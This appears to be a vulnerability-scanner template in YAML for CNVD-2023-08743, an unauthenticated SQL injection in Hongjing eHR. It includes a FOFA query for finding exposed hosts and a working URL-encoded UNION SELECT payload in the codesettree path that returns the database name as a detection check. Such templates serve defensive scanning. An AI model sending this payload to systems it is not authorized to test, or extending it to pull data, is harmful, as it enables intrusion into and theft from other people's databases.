id: CNVD-2023-08743

info:
  name: 宏景 eHR SQL 注入漏洞
  author: oxsonder
  severity: high
  verified: true
  description: |
    宏景人力系统 存在SQL注入漏洞(CNVD-2023-08743)，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。
    FOFA: body='<div class="hj-hy-all-one-logo"'
  reference:
    - https://mp.weixin.qq.com/s/NhJe4MUepwqc6SmDJw4aow
    - https://mp.weixin.qq.com/s/N5qe_tuqRC1QxwX6RvvXeg
  created: 2023/06/22

set:
  randstr: randomLowercase(12)    
rules:
  r0:
    request:
      method: GET
      path: /servlet/codesettree?categories=~31~27~20union~20all~20select~20~27hellohongjingHcm~27~2cdb~5fname~28~29~2d~2d&codesetid=1&flag=c&parentid=-1&status=1
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'<TreeNode') &&
      response.body.bcontains(b'id="hellohongjingHcm"') &&
      response.body.bcontains(b'text="hellohongjingHcm')
expression: r0()